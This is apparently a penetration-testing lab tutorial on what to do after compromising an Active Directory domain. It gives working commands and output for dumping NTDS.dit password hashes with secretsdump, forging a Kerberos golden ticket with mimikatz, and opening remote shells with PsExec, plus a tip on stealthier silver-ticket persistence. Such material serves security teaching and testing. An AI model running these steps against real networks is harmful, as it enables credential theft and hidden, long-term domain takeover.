After compromising a domain, it's crucial to provide comprehensive value to the client by:
-
Identifying Additional Security Issues: Conduct thorough scans and analyses to uncover other vulnerabilities within the network.
-
Dumping the NTDS.dit and Cracking Passwords: Extract and analyze the NTDS.dit file to retrieve and crack user passwords, gaining deeper insights into potential security weaknesses.
-
Enumerating Shares for Sensitive Information: Investigate shared resources to identify and report any sensitive or critical information that may be improperly exposed.
Ensure you have strategies in place to maintain access, even if initial entry points are lost:
-
Contingency for Domain Admin Account Loss: Plan for scenarios where access to the compromised domain admin account might be revoked.
-
Create a Temporary Domain Admin Account: Establish a new domain admin account for testing purposes. This should be detectable by the client as part of their security measures. Remember to delete the account after the engagement concludes.
-
Create a Golden Ticket: Use Kerberos golden ticket attacks to establish long-term access by forging Kerberos tickets for any account, effectively bypassing traditional authentication mechanisms.
Once your tasks are complete, take a moment to acknowledge your achievements with a small ritual or celebration. It's important to recognize the hard work and expertise involved in successfully executing these complex tasks.
The NTDS.dit file is a critical Active Directory (AD) database that contains:
-
User Information: Details about user accounts within the domain.
-
Group Information: Data on groups and their memberships.
-
Security Descriptors: Permissions and security settings for objects.
-
Password Hashes: Encrypted password data for domain users.
-
To extract NTLM hashes from the NTDS.dit file, you can use the following command:
secretsdump.py MARVEL.local/administrator:'P@$$w0rd!'@192.168.92.155 -just-dc-ntlm
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:920ae267e048417fcfe00f49ecbd4b33:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9157c7f7e38e6af9b89829458ab59066:::
MARVEL.local\fcastle:1103:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
MARVEL.local\tstark:1104:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
MARVEL.local\pparker:1105:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
MARVEL.local\dlieberman:1106:aad3b435b51404eeaad3b435b51404ee:c39f2beb3d2ec06a62cb887fb391dee0:::
MARVEL.local\SQLService:1107:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
HYDRA-DC$:1000:aad3b435b51404eeaad3b435b51404ee:b65eb89a4d6b7cdd81ec9ae9ec677e94:::
THEPUNISHER$:1108:aad3b435b51404eeaad3b435b51404ee:edec829a7d22d6d6397c064eb9b7bfe9:::
MICROCHIP$:1109:aad3b435b51404eeaad3b435b51404ee:28f0ac167845d63e25c43d648066aafb:::
[*] Cleaning up...
- KRBTGT Account Compromise: Compromising the KRBTGT account (the Kerberos Ticket Granting Ticket account) grants attackers full control over the domain.
- Unlimited Access: Attackers can request access to any resource or system within the domain without restrictions.
- Golden Tickets: These tickets provide comprehensive, persistent access to every machine and resource on the domain, effectively allowing attackers to operate with complete freedom.
-
Log in to the Domain Controller:
- Ensure
mimikatzis installed and run it:mimikatz.exe
- Ensure
-
Enable Debug Privileges:
- Execute the following command to enable necessary privileges:
privilege::debug
- Execute the following command to enable necessary privileges:
-
Dump the
krbtgtAccount Hash:-
Use
mimikatzto dump thekrbtgtaccount password hash:lsadump::lsa /inject /name:krbtgt
-
Copy the domain SID and the Kerberos Ticket Granting Ticket (TGT) account NTLM hash. Output:
Domain : MARVEL / S-1-5-21-3387567906-2370868817-662316906 Primary NTLM : 9157c7f7e38e6af9b89829458ab59066
-
-
Generate the Golden Ticket:
- Use the copied SID and
krbtgtNTLM hash to create a Golden Ticket:kerberos::golden /User:Administrator /domain:marvel.local /sid:S-1-5-21-3387567906-2370868817-662316906 /krbtgt:9157c7f7e38e6af9b89829458ab59066 /id:500 /ptt
/id:500: Specifies the user ID for the administrator./ptt: Indicates "Pass-The-Ticket," meaning the ticket will be injected directly.
- Use the copied SID and
-
Use the Golden Ticket to Access Other Machines:
-
Open a command shell using the golden ticket:
misc::cmd
-
To verify access, list the contents of a remote machine’s C$ share:
dir \\THEPUNISHER\c$
Output:
Volume in drive \\THEPUNISHER\c$ has no label. Volume Serial Number is BEFE-B549 Directory of \\THEPUNISHER\c$ 12/07/2019 02:14 AM <DIR> PerfLogs 07/30/2024 02:25 AM <DIR> Program Files 09/07/2022 08:16 PM <DIR> Program Files (x86) 07/30/2024 03:04 AM <DIR> Share 07/30/2024 03:25 AM <DIR> Users 07/30/2024 02:53 AM <DIR> Windows 0 File(s) 0 bytes 6 Dir(s) 39,140,675,584 bytes free
-
-
Initiate a Remote Command Shell:
- Download
PsExecfor remote command execution:curl -L -o "C:\Users\Administrator\PSTools.zip" "https://download.sysinternals.com/files/PSTools.zip"
- Unzip it after creating a folder:
mkdir C:\Users\Administrator\PSTools tar -xf C:\Users\Administrator\PSTools.zip -C C:\Users\Administrator\PSTools
- Use
PsExecto start a remote command shell:PsExec.exe \\THEPUNISHER cmd.exe
- Download
- Golden tickets are increasingly being detected. Consider using Silver Tickets as a more subtle alternative for persistence (https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/silver-ticket).